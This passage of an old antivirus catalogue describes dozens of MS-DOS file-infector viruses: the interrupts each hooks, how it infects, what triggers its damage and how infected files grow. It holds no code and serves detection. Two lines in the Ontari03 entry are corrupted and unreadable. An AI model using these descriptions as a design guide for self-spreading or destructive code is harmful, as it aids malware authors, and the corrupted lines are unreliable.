  3715.    I/O error (such as write protect).
  3716.  
  3717. [X-1-B]
  3718. Virus Name: X-1-B
  3719. Virus Type: File Infector Virus
  3720.             (infects .EXE files)
  3721. Virus Length: 555 Bytes(EXE)
  3722. PC Vectors Hooked: None
  3723. Executing Procedure:
  3724. 1) The virus checks whether the system date is the
  3725.    5th of   March  If "Yes", it displays the
  3726.    message: "ICE-9 Present In Association with..
  3727.    The ARcV [X-1] Michelangelo activates. .
  3728.    -<TOMORROW>-", then the system halts.
  3729. 2) If "No", then it searches for an .EXE file in
  3730.    the current directory.
  3731. 3) It checks whether it has been selected already
  3732.    by X-1. If "Yes", it continues to look for an
  3733.    uninfected .EXE file.
  3734. 4) It then infects only one file at a time.
  3735. 5) Then it executes the original file.
  3736. Damage:
  3737. If it is the 5th of  March, it displays a message,
  3738. and then the system halts.
  3739. Detecting Method:
  3740. Infected files will increase by 555 Bytes.
  3741. Note:
  3742. 1) Doesn't stay resident in memory.
  3743. 2) X-1 doesn't hook INT 24h when infecting files.
  3744.    An error message occurs if there is an I/O
  3745.    error (such as  write protect).
  3746.  
  3747. [Lep-FVHS]
  3748. Virus Name: LEP-FVHS
  3749. Virus Type: File Infector Virus
  3750.             (infects .COM & .EXE files)
  3751. Virus Length: NO change.
  3752. PC Vectors Hooked: None
  3753.  
  3754. Executing Procedure:
  3755. 1) Shows the message: "allocating memory.....
  3756.    Please wait.....    Hard time accessing memory,
  3757.    please turn off all RAM resident programs and
  3758.    press>>Enter<< to continue...."
  3759. 2) The virus searches for an .EXE or .COM file in
  3760.    the current directory.
  3761. 3) It checks whether it has been infected by
  3762.    LEP-FVHS.  If "Yes", it continues to look for
  3763.    an uninfected .EXE or .COM file.
  3764. 4) If "No", then infects any four .EXE & .COM
  3765.    files at a time  in the current directory.
  3766. 5) Shows the message: "Program too big to fit in
  3767.    memory."
  3768.  
  3769. Damage:
  3770. Overwrites original files, so the length of
  3771. infected files won't increase.
  3772. Detecting Method:
  3773. Shows the message: "Allocating memory...."
  3774. Note:
  3775. 1) Doesn't stay resident in memory.
  3776. 2) LEP-FVHS doesn't  hook INT 24h when infecting
  3777.    files.  An error message occurs if there is an
  3778.    I/O error (such as write protect).
  3779.  
  3780. [Monxla]
  3781. Virus Name: MONXLA
  3782. Virus Type: File Infector Virus
  3783.             (infects .COM files)
  3784. Virus Length: 939 Bytes(COM)
  3785. PC Vectors Hooked: None
  3786. Executing Procedure:
  3787. 1) The virus searches for a .COM file in the
  3788.    current directory. .
  3789. 2) It checks whether the system date is the 13th,
  3790.    if "Yes", then it destroys the file.
  3791. 3) If "No", it checks whether it has been infected
  3792.    by MONXLA.  If "Yes", it has been infected, it
  3793.    continues to look for an uninfected .COM file.
  3794. 3) It then infects any one .COM file in the
  3795.    current directory.
  3796. 4) Finally it executes the original file.
  3797. Damage:
  3798. If the system date is the 13th, then it destroys a
  3799. .COM file.
  3800. Detecting Method:
  3801. Infected files will increase by 939 Bytes.
  3802. Note:
  3803. 1) Doesn't stay resident in memory.
  3804. 2) MONXLA doesn't hook INT 24h when infecting
  3805.    files.  An error message occurs if there is an
  3806.    I/O error (such as write protect).
  3807.  
  3808. [More-649]
  3809. Virus Name: MORE-649
  3810. Virus Type:
  3811. Memory Resident, File Infector Virus (infects
  3812. .COM files).
  3813. Virus Length:  649 Bytes (COM)
  3814. PC Vectors Hooked:
  3815. INT 21h (AX=4B00h) (execute program)
  3816. Infecting Procedure:
  3817. 1) The virus checks whether it is already
  3818.    loaded resident in memory. If "No", it then
  3819.    loads itself into resident memory by hooking
  3820.    INT 21h.
  3821. 2) It then executes the original file.
  3822. 3) With itself loaded into resident memory it will
  3823.    infect any uninfected file that is executed.
  3824.    (b) It doesn't infect .EXE files or files with
  3825.    special times (year larger than 1999).
  3826. 4) When the virus detects a file that has a YEAR
  3827.    date larger than 1999, a message appears:
  3828.    "OH NO NOT MORE ARCV".
  3829. Damage:  None.
  3830. Detecting Method:
  3831. 1)  Infected .COM files increase by 649 Bytes.
  3832.  
  3833. [Arka]
  3834. Virus Name: ARKA
  3835. Virus Type: Memory Resident, File Infector Virus
  3836.            (infects .COM files).
  3837. Virus Length:  1905 Bytes (COM)
  3838. PC Vectors Hooked:
  3839. INT 21h (AX=4B00h) (execute program)
  3840. Infecting Procedure:
  3841. 1)  The virus checks whether it is already loaded
  3842.     resident in memory. If "No", it then loads
  3843.     itself into resident memory by hooking INT
  3844.     21h.
  3845. 2) It then executes the original file.
  3846. 3) With itself loaded into resident memory it
  3847.    will infect any executed file that is not
  3848.    already infected with the ARKA virus.
  3849. Damage:  None.
  3850. Detecting Method:
  3851. 1)  Infected COM files increase by 1905 Bytes.
  3852.  
  3853. [578]
  3854. Virus Name: 578
  3855. Virus Type:  Memory Resident, File Infector Virus
  3856.              (infects .COM     files).
  3857. Virus Length:  578 Bytes (COM)
  3858. PC Vectors Hooked: INT 21h
  3859.                    (AX=4B00h) (execute program)
  3860. Infecting Procedure:
  3861. 1)  The virus checks whether it is already loaded
  3862.     resident in memory. If "No", it then loads
  3863.     itself into resident memory by hooking INT
  3864.     21h.
  3865. 2) It then executes the original file.
  3866. 3) With itself loaded into resident memory it will
  3867.    infect any uninfected file that is executed.
  3868.    (b) It doesn't infect .EXE files.
  3869. 4) The virus will then check the system date if is
  3870.    later than April 3rd, then the virus will destroy
  3871.    all data on "A:" followed by showing a three
  3872.    colored flag and the message: "ITALY IS THE BEST
  3873.    COUNTRY IN THE WORLD" on the screen.
  3874. Damage:
  3875. If system date is later than April 3rd, the virus
  3876. will destroy all data on "A:"
  3877. Detecting Method:
  3878. 1)  Infected COM files increase by 578 Bytes.
  3879. Note:
  3880. 1) 578 doesn't hook INT 24h when infecting files.
  3881.    An error message occurs if there is an I/O
  3882.    error (such as write protect).
  3883.  
  3884. [5LO]
  3885. Virus Name: 5LO
  3886. Virus Type:  Memory Resident, File Infector Virus
  3887.              (infects .EXE files).
  3888. Virus Length:  1125--1140 Bytes (EXE)
  3889. PC Vectors Hooked: INT 21h
  3890.                    (AX=4B00h) (execute program)
  3891. Infecting Procedure:
  3892. 1)  The virus checks whether it is already loaded
  3893.     resident in memory. If "No", it then loads
  3894.     itself into resident memory by hooking INT
  3895.     21h
  3896. 2) It then executes the original file.
  3897. 3) With itself loaded into resident memory it will
  3898.    infect any uninfected file that is executed.
  3899.    (b) It doesn't infect .COM files.
  3900. Damage:  None.
  3901. Detecting Method:
  3902. Infected .EXE files increase by 1125--1140 Bytes.
  3903. Note:
  3904. The 5LO virus doesn't hook INT 24h when infecting
  3905. files. An error message occurs if there is an I/O
  3906. error (such as write protect).
  3907.  
  3908. [Aids 552]
  3909. Virus Name: AIDS552
  3910. Virus Type:
  3911. Highest Memory Resident, File Infector Virus
  3912. (infects .EXE files).
  3913. Virus Length:  552 Bytes (EXE)
  3914. PC Vectors Hooked: INT 21h
  3915. Infecting Procedure:
  3916. 1)  The virus checks whether it is already loaded
  3917.     into resident memory. If "No", it then loads
  3918.     itself into memory  (highest memory) by
  3919.     hooking INT 21h.
  3920. 2) It then executes the original file.
  3921. 3) It infects when the command  "DEGUG
  3922.    FILE_NAME.EXE" is executed. b) Doesn't infect
  3923.    .COM files.)
  3924. Damage:  None
  3925. Detecting Method:
  3926. 1)  Infected .EXE files increase by 552 Bytes.
  3927. Note:
  3928. The  AIDS552 virus doesn't hook INT 24h when
  3929. infecting files.  An error message occurs if
  3930. there is an I/O error (such as write protect).
  3931.  
  3932. [408]
  3933. Virus Name: 408
  3934. Virus Type: Memory Resident, File Infector Virus
  3935.             (infects .COM files).
  3936. Virus Length:  408 Bytes (COM)
  3937. PC Vectors Hooked: INT 21h
  3938.                    (AX=4B00h) (execute program)
  3939. Infecting Procedure:
  3940. 1)  The virus checks whether it is already loaded
  3941.     resident in memory. If "No", it then loads
  3942.     itself into resident memory by hooking INT
  3943.     21h.
  3944. 2) It then executes the original file.
  3945. 3) With itself loaded into resident memory it
  3946.    will infect any uninfected file that is
  3947.    executed.  b) It doesn't infect .EXE files.
  3948. Detecting Method:
  3949. 1)  Infected files increase by 408 Bytes.
  3950. Note:
  3951. The 408 virus doesn't hook INT 24h when
  3952. infecting files. An error message occurs if there
  3953. is an I/O error (such as write protect).
  3954.  
  3955. [BOOJUM]
  3956. Virus Name: BOOJUM
  3957. Virus Type:  Highest Memory Resident, File
  3958.              Infector Virus (infects .EXE files).
  3959. Virus Length:  340 Bytes (EXE)
  3960. PC Vectors Hooked: INT 21h
  3961. Infecting Procedure:
  3962. 1)  The virus checks whether it is already loaded
  3963.     resident in memory. If "No", it then loads
  3964.     itself into memory (highest memory) by
  3965.     hooking INT 21h.
  3966. 2) It then executes the original file.
  3967. 3) With itself loaded into memory it will infect
  3968.    any uninfected file that is executed.  b) It
  3969.    doesn't infect .COM files.
  3970. Damage:  None
  3971. Detecting Method:
  3972. 1)  Infected EXE files increase by 340 Bytes.
  3973. Note:
  3974. The BOOJUM virus doesn't hook INT 24h when
  3975. infecting files. An error message occurs if
  3976. there is an I/O error (such as write protect).
  3977.  
  3978. [Shirley]
  3979. Virus Name: SHIRLEY
  3980. Virus Type: Memory Resident, File Infector Virus
  3981.             (infects .EXE files).
  3982. Virus Length:  4110 Bytes (EXE)
  3983. PC Vectors Hooked: INT 21h
  3984. Infecting Procedure:
  3985. 1)  The virus checks whether it is already loaded
  3986.     resident in memory. If "No", it then loads
  3987.     itself into resident memory (highest memory)
  3988.     by hooking INT 21h.
  3989. 2) It then executes the original file.
  3990. 3) With itself loaded into resident memory it
  3991.    will infect any uninfected file that is
  3992.    executed. b) It doesn't infect .COM files.
  3993. Damage:  None
  3994. Detecting Method:
  3995. Infected EXE files increase by 4110 Bytes.
  3996. Note:
  3997. The Shirley virus doesn't hook INT 24h when
  3998. infecting files. An error message occurs if there
  3999. is an I/O error (such as write protect).
  4000.  
  4001. [D-Tiny]
  4002. Virus Name: D-TINY
  4003. Virus Type: Memory Resident, File Infector Virus
  4004.             (infects .COM files).
  4005. Virus Length:  126 Bytes (COM)
  4006. PC Vectors Hooked: INT 21h
  4007. Infecting Procedure:
  4008. 1)  The virus checks whether it is already loaded
  4009.     resident in memory. If "No", it then loads
  4010.     itself into resident memory by hooking INT
  4011.     21h.
  4012. 2) It then executes the original file.
  4013. 3) With itself loaded into resident memory it will
  4014.    infect any uninfected file that is executed.
  4015.    b) It doesn't infect .EXE files.
  4016. Damage:  None
  4017. Detecting Method:
  4018. Infected COM files increase by 126 Bytes.
  4019. Note:
  4020. D-TINY doesn't hook INT 24h when infecting files.
  4021. An error message occurs if there is an I/O error
  4022. (such as write protect).
  4023.  
  4024. [01-07]
  4025. Virus Name: 01-07
  4026. Virus Type: Memory Resident, File Infector Virus
  4027.             (infects .COM     files).
  4028. Virus Length:  639 Bytes (COM)
  4029. PC Vectors Hooked: INT 21h
  4030. Infecting Procedure:
  4031. 1) The virus checks whether the system date is
  4032.    between the 1st and the 6th of January.  If
  4033.    "Yes",  it shows the message:" Happy New Year "
  4034.    on the screen and the system halts.  If "No",
  4035.    the virus checks whether it is   already loaded
  4036.    resident in memory. If "No", it then loads
  4037.    itself into resident memory by hooking INT 21h.
  4038. 2) It then executes the original file.
  4039. 3) With itself loaded into resident memory it will
  4040.    infect any uninfected file that is executed.
  4041.    b) It doesn't infect .EXE files.
  4042. Damage:
  4043. System halts when the system date is between the
  4044. 1st and 6th of  January.
  4045. Detecting Method:
  4046. Infected files increase by 639 Bytes.
  4047. Note:
  4048. The 01-07 virus doesn't hook INT 24h when
  4049. infecting files.  An error message occurs if
  4050. there is an I/O error (such as write protect).
  4051.  
  4052. [Bit_Addict]
  4053. Virus Name: BIT_ADDICT
  4054. Virus Type: Memory Resident, File Infector Virus
  4055.             (infects .COM     files).
  4056. Virus Length:  477 Bytes (COM)
  4057. PC Vectors Hooked: INT 21h
  4058. Infecting Procedure:
  4059. 1)  The virus checks whether it is already loaded
  4060.     resident in memory. If "No", it then loads
  4061.     itself into resident memory by hooking INT
  4062.     21h.
  4063. 2) It then executes the original file.
  4064. 3) With itself loaded into resident memory it
  4065.    will infect any uninfected file that is
  4066.    executed.  b) It doesn't infect .EXE files.
  4067. Damage:
  4068. When the virus infects 100 files, it will
  4069. destroy all data on the hard disk, then show
  4070. the message: "BIT ADDICTMZ> .... The Bit Addict
  4071. says: You have a good tasting hard disk, it was
  4072. delicious !!!"
  4073. Detecting Method:
  4074. Infected files increase by 477 Bytes.
  4075. Note:
  4076. The BIT_ADDICT virus doesn't hook INT 24h when
  4077. infecting files.  An error message occurs if
  4078. there is an I/O error (such as write protect).
  4079.  
  4080. [CSL-2]
  4081. Virus Name: CSL-2
  4082. Virus Type: Highest Memory Resident, File
  4083.             Infector Virus (infects .COM files).
  4084. Virus Length:  709 Bytes (COM)
  4085. PC Vectors Hooked: INT 21h
  4086.                    (AX=4B00h) (execute program)
  4087. Infecting Procedure:
  4088. 1)  The virus checks whether it is already loaded
  4089.     resident in memory. If "No", it then loads
  4090.     itself into resident memory by hooking INT
  4091.     21h.
  4092. 2) It then executes the original file.
  4093. 3) With itself loaded into resident memory it will
  4094.    infect any uninfected file that is executed.
  4095.    b) It doesn't infect .EXE files.
  4096. Damage:   None.
  4097. Detecting Method:
  4098. Infected files increase by 709 Bytes.
  4099. Note:
  4100. The CSL-2 virus doesn't hook INT 24h when infecting
  4101. files. An error message occurs if there is an I/O
  4102. error (such as write protect).
  4103.  
  4104. [Highland]
  4105. Virus Name: HIGHLAND
  4106. Virus Type:  Memory Resident, File Infector
  4107.              Virus (infects .COM files).
  4108. Virus Length:  477 Bytes (COM)
  4109. PC Vectors Hooked: INT 21h
  4110.                    (AX=4B00h) (execute program)
  4111. Infecting Procedure:
  4112. 1)  The virus checks whether it is already loaded
  4113.     resident in memory. If "No", it then loads
  4114.     itself into resident memory by hooking INT
  4115.     21h.
  4116. 2) It then executes the original file.
  4117. 3) With itself loaded into resident memory it
  4118.    will infect any uninfected file that is
  4119.    executed.  b) It doesn't infect .EXE files.
  4120. Damage:
  4121. When the system date is the 29th, all files
  4122. infected by highland can't be executed.
  4123. Detecting Method:
  4124. Infected files increase by 477 Bytes.
  4125. Note:
  4126. Highland doesn't hook INT 24h when infecting
  4127. files.  An error message occurs if there is an
  4128. I/O error (such as write protect).
  4129.  
  4130. [CMDR]
  4131. Virus Name: CMDR
  4132. Virus Type:  Memory Resident, File Infector
  4133.              Virus (infects .COM     files).
  4134. Virus Length:  4096 Bytes (COM)
  4135. PC Vectors Hooked: INT 21h
  4136.                    (AX=4B00h) (execute program)
  4137. Infecting Procedure:
  4138. 1) The virus checks whether it is already loaded
  4139.    resident in memory. If "No", it then loads
  4140.    itself into resident memory by hooking INT
  4141.    21h.
  4142. 2) It then executes the original file.
  4143. 3) With itself loaded into resident memory it will
  4144.    infect any uninfected file that is executed.
  4145.    b) It doesn't infect .EXE files.
  4146. Damage:   None.
  4147. Detecting Method:
  4148. Infected files increase by 4096 Bytes.
  4149. Note:
  4150. The CMDR virus doesn't hook INT 24h when infecting
  4151. files. An error message occurs if there is an I/O
  4152. error (such as write protect).
  4153.  
  4154. [POX]
  4155. Virus Name: POX
  4156. Virus Type:  Highest Memory Resident, File
  4157.              Infector Virus (infects .COM files).
  4158. Virus Length:  609 Bytes (COM)
  4159. PC Vectors Hooked: INT 21h (AX=4B00h)
  4160.                    (execute program), INT 9h
  4161. Infecting Procedure:
  4162. 1)  The virus checks whether it is already loaded
  4163.     resident in memory. If "No", it then loads
  4164.     itself into resident memory (highest memory)
  4165.     by hooking INT  21h.
  4166. 2) It then executes the original file.
  4167. 3) With itself loaded into resident memory it will
  4168.    infect any uninfected file that is executed.
  4169.    b) It doesn't infect .EXE files.
  4170. Damage:
  4171. POX hooks INT 9h, when the <Delete> key is
  4172. pressed, the virus will check the system date, if
  4173. DAY=24, it will format the hard disk..
  4174. Detecting Method:
  4175. Infected files increase by 609 Bytes.
  4176. Note:
  4177. The POX virus doesn't hook INT 24h when infecting
  4178. files.  An error message occurs if there is an I/O
  4179. error (such as write protect).
  4180.  
  4181. [SBC-1]
  4182. Virus Name: SBC-1
  4183. Virus Type: Highest Memory Resident, File Infector
  4184.             Virus (infects .COM    files).
  4185. Virus Length:  No change
  4186. PC Vectors Hooked: INT 21h
  4187.                    (AX=4B00h) (execute program)
  4188. Infecting Procedure:
  4189. 1)  The virus checks whether it is already loaded
  4190.     resident in memory. If "No", it then loads
  4191.     itself into resident memory (highest memory)
  4192.     by hooking INT 21h.
  4193. 2) It then checks whether the "COMMAND.COM" file
  4194.    has been infected, if "No", then it infects
  4195.    the file.
  4196. 3) It then executes the original file.
  4197. 4) With itself loaded into resident memory it
  4198.    will infect any uninfected file that is
  4199.    executed.  b) It doesn't infect .EXE files.
  4200. Damage:
  4201. Overwrites original file when infects, so the
  4202. length of infected files won't increase.
  4203. Detecting Method:  None
  4204. Note:
  4205. The SBC-1 doesn't hook INT 24h when infecting
  4206. files.  An error message occurs if there is an
  4207. I/O error (such as write protect).
  4208.  
  4209. [Nov_17-1]
  4210. Virus Name: NOV_17-1
  4211. Virus Type: Highest Memory Resident, File Infector
  4212.             Virus (infects .COM    & .EXE files).
  4213. Virus Length:  768 Bytes (COM & EXE)
  4214. PC Vectors Hooked: INT 21h
  4215.                    (AX=4B00h) (execute program)
  4216. Infecting Procedure:
  4217. 1)  The virus checks whether it is already loaded
  4218.     resident in memory. If "No", it then loads
  4219.     itself into resident memory by hooking INT
  4220.     21h.
  4221. 2) It then executes the original file.
  4222. 3) With itself loaded into resident memory it
  4223.    will infect any uninfected file that is
  4224.    executed.
  4225. Damage:   None.
  4226. Detecting Method:
  4227. 1)  Infected files increase by 768 Bytes.
  4228. Note:
  4229. The NOV_17-1 virus doesn't hook INT 24h when
  4230. infecting files.  An error message occurs if
  4231. there is an I/O error (such as write protect).
  4232.  
  4233. [HBT]
  4234. Virus Name: HBT
  4235. Virus Type: Memory Resident, File Infector
  4236.             Virus (infects .COM & .EXE files).
  4237. Virus Length:  394 Bytes (COM & EXE)
  4238. PC Vectors Hooked: INT 21h
  4239.                    (AX=4B00h) (execute program)
  4240. Infecting Procedure:
  4241. 1) The virus checks whether it is already loaded
  4242.    resident in memory. If "No", it then loads
  4243.    itself into resident memory by hooking INT
  4244.    21h.
  4245. 2) It then executes the original file.
  4246. 3) With itself loaded into resident memory it will
  4247.    infect any uninfected file that is executed.
  4248. Damage:
  4249. When the virus is in resident memory, a file can't
  4250. be executed, but only infected.
  4251. Detecting Method:
  4252. Infected files increase by 394 Bytes.
  4253. Note:
  4254. The  HBT virus doesn't hook INT 24h when infecting
  4255. files.  An error message occurs
  4256. if there is an I/O error (such as write protect).
  4257.  
  4258. [Gotcha]
  4259. Virus Name: GOTCHA
  4260. Virus Type: Highest Memory Resident, File Infector
  4261.             Virus (infects .COM & .EXE files).
  4262. Virus Length:  906 Bytes (COM & EXE)
  4263. PC Vectors Hooked: INT 21h (AX=4B00h)
  4264.                    (execute program), INT 24h
  4265. Infecting Procedure:
  4266. 1) The virus checks whether it is already loaded
  4267.    resident in memory. If "No", it then loads
  4268.    itself into resident memory (highest memory)
  4269.    by hooking INT 21h.
  4270. 2) It then executes the original file.
  4271. 3) With itself loaded into resident memory it
  4272.    will infect any uninfected file that is
  4273.    executed.
  4274. a) It also infects when a file is renamed, file
  4275.    attributes are set ,search for a  matching
  4276.    file or deleting a file.
  4277. Damage:   None.
  4278. Detecting Method:
  4279. Infected files increase by 906 Bytes.
  4280. Note:
  4281. The Gotcha virus hooks INT 24h when infecting
  4282. files. Omits I/O error (such as write protect).
  4283.  
  4284. [Voronezh-2]
  4285. Virus Name: VORONEZH-2
  4286. Virus Type: Highest Memory Resident, File Infector
  4287.             Virus (infects .COM & .EXE files).
  4288. Virus Length:  1600 Bytes (COM & EXE)
  4289. PC Vectors Hooked: INT 21h (AX=4B00h)
  4290.                    (execute program), INT 24h
  4291. Infecting Procedure:
  4292. 1) The virus checks whether it is already loaded
  4293.    resident in memory. If "No", it then loads
  4294.    itself into resident memory by hooking INT 21h.
  4295. 2) It then executes the original file.
  4296. 3) With itself loaded into resident memory it will
  4297.    infect any uninfected file that is executed.
  4298. Damage:   None.
  4299. Detecting Method:
  4300. Infected files increase by 1600 Bytes.
  4301. Note:
  4302. The Voronezh-2 virus  hooks INT 24h when infecting
  4303. files. It omits I/O errors(such as write protect).
  4304.  
  4305. [Amilia]
  4306. Virus Name: AMILIA
  4307. Virus Type: Memory Resident, File Infector
  4308.             Virus (infects .COM & .EXE files).
  4309. Virus Length:  1614 Bytes (COM & EXE)
  4310. PC Vectors Hooked: INT 21h (AX=4B00h)
  4311.                    (execute program), INT 24h
  4312. Infecting Procedure:
  4313. 1) The virus checks whether it is already loaded
  4314.    resident in memory. If "No", it then loads
  4315.    itself into resident memory by hooking INT 21h.
  4316. 2) It then executes the original file.
  4317. 3) With itself loaded into resident memory it will
  4318.    infect any uninfected file that is executed.
  4319. Damage:
  4320. 1) If it is Sunday, a message is displayed on the
  4321.    screen: "Amilia I virii - [NUKE]  1991 By Rock
  4322.    Steady/NUKE", then the system  halts.
  4323. 2) If it is between 4 and 5 o'clock in the
  4324.    afternoon, a smilie face shows on the screen
  4325.    here and there.
  4326. Detecting Method:
  4327. 1) Infected files increase by 1614 Bytes.
  4328. 2) A smilie face appears on the screen.
  4329. Note:
  4330. The Amilia virus hooks INT 24h when infecting
  4331. files. It omits I/O errors(such as write protect).
  4332.  
  4333. [981]
  4334. Virus Name: 981
  4335. Virus Type: Highest Memory Resident, File Infector
  4336.             Virus (infects .COM & .EXE files).
  4337. Virus Length:  981 Bytes (COM),
  4338.                about 1010 Bytes(EXE)
  4339. PC Vectors Hooked: INT 21h (AX=4B00h)
  4340.                    (execute program), INT 24h
  4341. Infecting Procedure:
  4342. 1) The virus checks the DOS version, if the DOS
  4343.    version is earlier than 3.0 it will show  the
  4344.    message: " This program requires MS-DOS 3.0 or
  4345.    later ".
  4346. 2) The virus checks whether it is already loaded
  4347.    resident in memory. If "No", it then loads
  4348.    itself into resident memory (highest memory) by
  4349.    hooking INT 21h.
  4350. 2) It then executes the original file.
  4351. 3) With itself loaded into resident  memory it
  4352.    will infect any uninfected file that is
  4353.    executed.
  4354. Damage:   None.
  4355. Detecting Method:
  4356. 1)  Infected .COM files increase by 981 Bytes,
  4357.     .EXE files increase by 1010 Bytes.
  4358. Note:
  4359. The 981 virus hooks INT 24h when infecting files.
  4360. It omits I/O errors (such as write protect).
  4361.  
  4362. [Gotcha-2]
  4363. Virus Name: GOTCHA-2
  4364. Virus Type: Highest Memory Resident, File Infector
  4365.             Virus (infects .COM & .EXE files).
  4366. Virus Length:  627 Bytes (COM), 527 Bytes (EXE)
  4367. PC Vectors Hooked: INT 21h (AX=4B00h)
  4368.                    (execute program), INT 24h
  4369. Infecting Procedure:
  4370. 1) The virus checks whether it is already loaded
  4371.    resident in memory. If "No", it then loads
  4372.    itself into resident memory by hooking INT
  4373.    21h.
  4374. 2) It then executes the original file.
  4375. 3) With itself loaded into resident memory it will
  4376.    infect any uninfected file that is executed.
  4377.    a) Before it infects a file, it will check the
  4378.    file name.
  4379. Damage:   None.
  4380. Detecting Method:
  4381. 1) Infected .COM files increase by 627 Bytes and
  4382.    .EXE files increase by 527  Bytes.
  4383. Note:
  4384. The Gotcha-2 virus hooks INT 24h and closes the
  4385. "control_break" function when infecting files. It
  4386. omits I/O errors (such as write protect).
  4387.  
  4388. [Hungarian]
  4389. Virus Name: HUNGARIAN
  4390. Virus Type: Highest Memory Resident, File Infector
  4391.             Virus (infects .COM & .EXE files).
  4392. Virus Length:  749 Bytes (COM & EXE)
  4393. PC Vectors Hooked: INT 21h (AX=4B00h)
  4394.                    (execute program), INT 24h,
  4395.                    INT 8h
  4396. Infecting Procedure:
  4397. 1)  The virus checks whether it is already loaded
  4398.     resident in memory. If "No", it then loads
  4399.     itself into resident memory (highest memory)
  4400.     by hooking INT 21h.
  4401. 2) If (Year=1990 and month >=6) then it will hook
  4402.    INT 8h.
  4403. 3) It then executes the original file.
  4404. 4) With itself loaded into resident memory it will
  4405.    infect any uninfected file that is executed.
  4406. Damage: When Hungarian hooks INT 8h, it will set
  4407.        the Counter to 0xFFFF. Each time when INT
  4408.        8h  is called, the counter  will decrease
  4409.        by one.  When the  counter equals zero
  4410.        (about one hour), it will begin to destroy
  4411.        files. Whenever you run any file, it will
  4412.        be destroyed.
  4413. Detecting Method:  Infected files increase by
  4414.                    749 Bytes.
  4415. Note:  The Hungarian virus hooks INT 24h when
  4416.        infecting  files.  It omits I/O errors
  4417.        (such as write protect).
  4418.  
  4419. [CK]
  4420. Virus Name: CK
  4421. Virus Type:  Memory Resident, File Infector
  4422.              Virus (infects .COM  & .EXE files).
  4423. Virus Length:  1163 Bytes (COM & EXE)
  4424. PC Vectors Hooked: INT 21h (AX=4B00h) (execute
  4425.                    program), INT 24h, INT 13h
  4426. Infecting Procedure:
  4427. 1) The virus checks whether it is already loaded
  4428.    resident in memory. If "No", it then loads
  4429.    itself into resident memory by hooking INT 21h.
  4430. 2) It then executes the original file.
  4431. 3) With itself loaded into resident memory it will
  4432.    infect any uninfected file that is executed.
  4433. Damage: The virus hook INT 13h, some time later,
  4434.         system will make sound.
  4435. Detecting Method:   Infected files increase by
  4436.                     1163 Bytes.
  4437. Note:  The CK virus hooks INT 24h when infecting
  4438.        files.  It omits I/O errors (such as write
  4439.        protect).
  4440.  
  4441. [2136]
  4442. Virus Name: 2136
  4443. Virus Type:  Highest Memory Resident, File
  4444.              Infector Virus
  4445.              (infects .COM & .EXE files).
  4446. Virus Length:  2136 Bytes (COM & EXE)
  4447. PC Vectors Hooked: INT 21h (AX=4B00h) (execute
  4448.                    program), INT 24h
  4449. Infecting Procedure:
  4450. 1)  The virus checks whether it is already loaded
  4451.     resident in memory. If "No", it then loads
  4452.     itself into resident memory by hooking INT
  4453.     21h.
  4454. 2) It then executes the original file.
  4455. 3) With itself loaded into resident memory it will
  4456.    infect any uninfected file that is executed.
  4457. Damage:   None.
  4458. Detecting Method:   Infected files increase by
  4459.                     2136 Bytes.
  4460. Note:  The 2136 virus hooks INT 24h when
  4461.        infecting files.  It omits I/O  errors
  4462.        (such as write protect).
  4463.  
  4464. [Casteggi]
  4465. Virus Name: CASTEGGI
  4466. Virus Type:  Highest Memory Resident, File
  4467.              Infector Virus
  4468.              (infects .COM    & .EXE files).
  4469. Virus Length:  2881 Bytes (COM & EXE)
  4470. PC Vectors Hooked: INT 21h (AX=4B00h) (execute
  4471.                    program), INT 24h, INT 1Ch
  4472. Infecting Procedure:
  4473. 1)  The virus checks whether it is already loaded
  4474.     resident in memory. If "No", it then loads
  4475.     itself into resident memory by hooking INT
  4476.     21h.
  4477. 2) It then executes the original file.
  4478. 3) With itself loaded into resident memory it
  4479.    will infect any uninfected file that is
  4480.    executed.
  4481. Damage: When DAY>10, the virus will count time by
  4482.         hooking INT 1Ch, about 6 minutes later,
  4483.         the screen image will be destroyed.
  4484. Detecting Method:
  4485. 1)  Infected files increase by 2881 Bytes.
  4486. Note: The Casteggi virus hooks INT 24h when
  4487.       infecting files.  It omits  I/O errors
  4488.       (such as write protect).
  4489.  
  4490. [Enola]
  4491. Virus Name: ENOLA
  4492. Virus Type:  Memory Resident, File Infector
  4493.              Virus (infects .COM  & .EXE files).
  4494. Virus Length:  1865--1875 Bytes (COM & EXE)
  4495. PC Vectors Hooked: INT 21h (AX=4B00h) (execute
  4496.                    program), INT 24h, INT 8h
  4497. Infecting Procedure:
  4498. 1) The virus checks whether it is already loaded
  4499.    resident in memory. If "No", it then loads
  4500.    itself into resident memory by hooking INT
  4501.    21h.
  4502. 2) It then executes the original file.
  4503. 3) With itself loaded into resident memory it
  4504.    will infect any uninfected file that is
  4505.    executed.
  4506. Damage: When the virus has stayed resident for 140
  4507.         minutes and INT 21h called more than 72
  4508.         times, all data on the hard disk will be
  4509.         destroyed.
  4510. Detecting Method:  Infected files increase by
  4511.                    1865-1875 Bytes.
  4512. Note: The Enola virus hooks INT 24h when infecting
  4513.       files. It omits I/O errors
  4514.       (such as write protect).
  4515.  
  4516. [Ontari03]
  4517. Virus Name: ONTARI03
  4518. Virus Type:  Highest Memory Resident, File
  4519.              Infector Virus
  4520.              (infects .COM & .EXE files).
  4521. Virus Length:  2048 Bytes (COM & EXE)
  4522. PC Vectors Hooked: INT 21h (AX=4B00h) (execute
  4523.                    program), INT 24h
  4524. Infecting Procedure:
  4525. 1) The virus checks whether it is already loaded
  4526.    resident in memory. If "No", it then loads
  4527.    itself into resident memory by hooking INT 21h.
  4528. *>) ∙| t°mn ²|ec²|es°|he°ori mna*,fiⁿm.
  4529. *?)  mth°mts²lf ⁿoad²l into resident memory it will
  4530.    infect any uninfected file that is executed.
  4531. Damage:   None.
  4532. Detecting Method:  Infected files increase by
  4533. 2048 Bytes.
  4534. Note:  The Ontari03 virus hooks INT 24h when
  4535.        infecting files. It omits I/O errors (such
  4536.        as write protect).
  4537.  
  4538. [PCBB-B]
  4539. Virus Name: PCBB-B
  4540. Virus Type:  Highest Memory Resident, File
  4541.              Infector Virus
  4542.              (infects .COM    & .EXE files).
  4543. Virus Length:  3072 Bytes (COM & EXE)
  4544. PC Vectors Hooked: INT 21h (AX=4B00h) (execute
  4545.                    program), INT 24h
  4546. Infecting Procedure:
  4547. 1) The virus checks whether it is already loaded
  4548.    resident in memory. If "No", it then loads
  4549.    itself into resident memory (highest memory)
  4550.    by hooking INT 21h.
  4551. 2) It then executes the original file.
  4552. 3) With itself loaded into resident memory it
  4553.    will infect any uninfected file that is
  4554.    executed.
  4555. Damage:   None.
  4556. Detecting Method:  Infected files increase by
  4557.                    3072 Bytes.
